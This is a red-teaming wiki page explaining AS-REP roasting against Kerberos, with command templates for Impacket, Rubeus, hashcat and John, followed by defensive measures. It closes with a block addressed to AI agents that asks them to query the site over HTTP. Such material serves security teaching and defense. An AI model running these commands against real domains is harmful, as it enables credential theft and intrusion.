# AS-REP Roasting

## AS-REP Roasting

### Overview

AS-REP roasting is a form of attack on the Kerberos authentication protocol that takes advantage of a known weakness in the protocol that can be exploited during initial authentication with a Key Distribution Center (KDC). AS-REP roasting allows a malicious actor to retrieve the password hash of any Kerberos user accounts that have the *Do not require Kerberos preauthentication* option enabled.

we have : user account with any privilege

we acquire : credentials for the anther user “**doesn’t require pre-authentication**”

![](/files/3UywyLN297XvIO1sPBEr)

### **About AS-REP**

AS-REP is a Kerberos message type that refers to an "Authentication Service" (AS) response message. It is transmitted between a kerberos server and client as part of the exchange of credentials needed to access a service. To generate an AS-REP message, first, the kerberos client asks to Kerberos Domain Controller (KDC) for a Ticket Granting Ticket (TGT) and a session key that are needed to obtain credentials for other services.

After the ticket granting ticket has been issued, the service ticket can be requested. That involves two messages: an AS\_REQ sent from the client to the kerberos server and an AS\_REP, which is sent in response to the AS\_REQ.

The AS-REP message contains the TGT and a session key which is used to request access to the intended service. The session key is encrypted with the requesting user’s password. AS-REP attacks are designed to extract and crack the session key, revealing the requesting account's password."

### How to Exploit ?

#### 1. **Scan for user accounts doesn’t require pre-authentication**

With [Impacket](https://github.com/SecureAuthCorp/impacket) example [GetNPUsers.py](http://GetNPUsers.py): "attempt to harvest the non-preauth AS\_REP responses for a given list of usernames.”

```
# check ASREPRoast for all domain users (credentials required)
python GetNPUsers.py <domain_name>/<domain_user>:<domain_user_password> -request -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>

# check ASREPRoast for a list of users (no credentials required)
python GetNPUsers.py <domain_name>/ -usersfile <users_file> -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>
```

With [Rubeus](https://github.com/GhostPack/Rubeus):

```
# check ASREPRoast for all users in current domain
.\\Rubeus.exe asreproast  /format:<AS_REP_responses_format [hashcat | john]> /outfile:<output_hashes_file>
```

#### 2. Cracking with dictionary of passwords

```
hashcat -m 18200 -a 0 <AS_REP_responses_file> <passwords_file>

john --wordlist=<passwords_file> <AS_REP_responses_file>
```

### Protections from AS-REP Roasting

* Identify Accounts that Do Not Require Preauthentication The obvious protections from this type of attack are to find and remove any instances of user accounts that are set to not require Kerberos preauthentication.
* Password Strength Another strong protection from this type of attack is to leverage long, complex passwords that will not be found in breached password dictionaries. Using fine-grained password policies especially for privileged accounts is a great first step. For additional protection against commonly breached passwords you can look at Enterprise Password Enforcer.
* AD Privileges It’s also important to understand what users have privileges to your AD user accounts and can enable this UAC value, as it can be enabled for just enough time to obtain the AS-REP hash, and then turned off again.

Resources

* <https://stealthbits.com/blog/cracking-active-directory-passwords-with-as-rep-roasting/>
* <https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a>
* [https://www.youtube.com/watch?v=EVdwnBFtUtQ](https://www.youtube.com/watch?v=EVdwnBFtUtQ\&t=2s)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://0xa1mn.gitbook.io/cyber-explained/red-teaming/attacking-kerberos/as-rep-roasting.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.